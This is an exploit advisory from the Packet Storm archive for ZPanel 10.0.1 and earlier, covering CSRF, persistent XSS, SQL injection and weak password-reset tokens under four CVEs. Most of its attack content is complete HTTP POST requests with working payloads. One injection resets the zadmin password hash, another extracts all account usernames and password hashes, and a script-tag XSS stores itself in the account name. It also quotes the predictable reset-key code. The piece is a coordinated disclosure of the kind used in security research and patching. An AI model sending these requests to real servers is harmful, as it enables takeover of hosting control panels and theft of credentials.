exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ZPanel 10.0.1 XSS / CSRF / SQL Injection

ZPanel 10.0.1 XSS / CSRF / SQL Injection
Posted Nov 5, 2012
Authored by pcsjj

ZPanel versions 10.0.1 and below suffer from cross site request forgery, cross site scripting, password reset, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection, csrf
advisories | CVE-2012-5683, CVE-2012-5684, CVE-2012-5685, CVE-2012-5686
SHA-256 | 170dd524a5401d3d677553774f59604d5461dc2071288c346adc2dee3d78f6c7

ZPanel 10.0.1 XSS / CSRF / SQL Injection

Change Mirror Download
# Exploit Title: ZPanel <= 10.0.1 CSRF, XSS, SQLi, Password Reset
# Date: 04/11/2012
# Exploit Author: pcsjj
# Vendor Homepage: http://www.zpanelcp.com/
# Version: 10.0.1
# Software Link: http://sourceforge.net/projects/zpanelcp/files/latest/download
# Downloads: 90,382
# CVE : CVE-2012-5683 (CSRF), CVE-2012-5684 (XSS), CVE-2012-5685(SQL Injection), CVE-2012-5686 (Password Reset)
# I'm going to guess there are some more here.

# 10/30/2012 - Contacted developers.
# 10/31/2012 - Developer states preference for reporting through bug tracker.
# 11/04/2012 - Developer confirms preference for reporting through bug tracker.
# 11/04/2012 - Vulnerability disclosed in bug tracker.

# Insufficient CSRF protection (CVE-2012-5683)
# All sensitive functions are lacking CSRF protection. One example below is
a request showing no authorization token is required for the creation of a
FTP user called "fun". This could also be used to deliver both XSS
(CVE-2012-5684) and SQLi (CVE-2012-5685) examples below.
#

http://192.168.1.100/?module=ftp_management&action=CreateFTP

POST /zpanel/?module=ftp_management&action=CreateFTP HTTP/1.1
Host: 192.168.1.100
Referer: http://192.168.1.100/?module=ftp_management
Cookie: PHPSESSID=4rcq0qoqcdp5f3e65jiuvsujd2
Content-Type: application/x-www-form-urlencoded
Content-Length: 107
inFTPUsername=fun&inPassword=fun&inAccess=RW&inAutoHome=2&inDestination=&inDestination=&inSubmit=

# Persistent XSS (CVE-2012-5684)
# The "inFullname" parameter is vulnerable to XSS. User's real name is not
being sanitized as it displayed within the control panel.
#

http://192.168.1.100/zpanel/?module=my_account&action=UpdateAccountSettings

POST /?module=my_account&action=UpdateAccountSettings HTTP/1.1
Host: 192.168.1.100
Referer:
http://192.168.1.100/zpanel/?module=my_account&action=UpdateAccountSettings
Cookie: PHPSESSID=4rcq0qoqcdp5f3e65jiuvsujd2
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
inFullname=Admin%3Cscript%3Ealert%28/fun/%29%3C%2Fscript%3E&inEmail=admin%
40example.com&inPhone=101&inLanguage=en&inAddress=Home&inPostalCode=101

# SQL Injection (CVE-2012-5685)
# "inEmailAddress" parameter is vulnerable to SQL injection. Since the
injection point is in an UPDATE statement its trivial to manipulate the
content of the database. For instance the zadmin password could be changed
to password.(5f4dcc3b5aa765d61d8327deb882cf99)
#

http://192.168.1.100/?module=manage_clients&action=UpdateClient

POST /?module=manage_clients&action=UpdateClient HTTP/1.1
Host: 192.168.182.128
Referer: http://192.168.1.100/?module=manage_clients&show=Edit&other=5
Cookie: PHPSESSID=4rcq0qoqcdp5f3e65jiuvsujd2
Content-Type: application/x-www-form-urlencoded
Content-Length: 257
inGroup=2&inPackage=2&inFullName=reseller&inEmailAddress=%27%2C+ac_pass_vc%3D%275f4dcc3b5aa765d61d8327deb882cf99%27%2C+ac_user_vc%3D%27zadmin%27+WHERE+ac_id_pk%3D1%3B--&inAddress=&inPostCode=&inPhone=101&inNewPassword=&inEnabled=1&inClientID=5&inSubmit=Save

# One more sqli example
# A user can extract data from db though an UPDATE statement by using a
subquery. As long as we update a field that is displayed back to us. To
reproduce this example you need to know your ClientID which can be found in
the referring page's url as the value of "other". In this example we use
the email field to hold the result of the subquery. Usually you can't
select from the table you're updating but by creating a temporary table
called "fun" we can avoid that. Using group_concat we get all columns and
all rows as a single string so that it all fits nicely in a single field.
#

http://192.168.1.100/?module=manage_clients&action=UpdateClient

POST /?module=manage_clients&action=UpdateClient HTTP/1.1
Host: 192.168.1.100
Referer: http://192.168.1.100/?module=manage_clients&show=Edit&other=5
#<!---- 5 is the Client ID or ac_id_pk
Cookie: PHPSESSID=4rcq0qoqcdp5f3e65jiuvsujd2
Content-Type: application/x-www-form-urlencoded
Content-Length: 335
inGroup=2&inPackage=2&inFullName=reseller&inEmailAddress=reseller%
40example.com
%27%2C+ac_email_vc%3D%28select+group_concat%28ac_user_vc%2C+ac_pass_vc%29+from+%28select+*+from+x_accounts%29+as+fun%29+where+ac_id_pk%3D%275%27%3B--&inAddress=&inPostCode=&inPhone=%2B44%281473%29+000+000&inNewPassword=&inEnabled=1&inClientID=5&inSubmit=Save

# Password Reset Weakness, Insufficient entropy (CVE-2012-5686)
# "randomkey" is not sufficiently random. By knowing server time an
attacker could reset a password and guess the key within a relatively low
number of requests. If the attacker can receive a password reset email for
any account on the system (demo account?) the number of attempts required
to guess reset key for another user (zadmin) can be greatly reduced. Since
the zadmin default admin account is "hard coded" it is especially at risk
to this password reset weakness. If you change zadmin username in the
zpanel_core db my experience is that you cannot load zpanel control panel.
#

# ZPanel source code for [INSTALL_DIR]/inc/init.inc.php
38 $randomkey = sha1(microtime());
46 $zdbh->exec("UPDATE x_accounts SET ac_resethash_tx = '" .
$randomkey . "' WHERE ac_id_pk=" . $result['ac_id_pk'] . "");
50 $phpmailer->Body = "Hi " . $result['ac_user_vc'] . ",
51 You or somebody pretending to be you has requested a password reset
link to be sent for your web hosting control panel login at: " .
ctrl_options::GetOption('cp_url') . "
52 If you wish to proceed with the password reset on your account
please use this link below to be taken to the password reset page.
53 http://" . ctrl_options::GetOption('zpanel_domain') . "/?resetkey="
. $randomkey . "
54 ";

Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close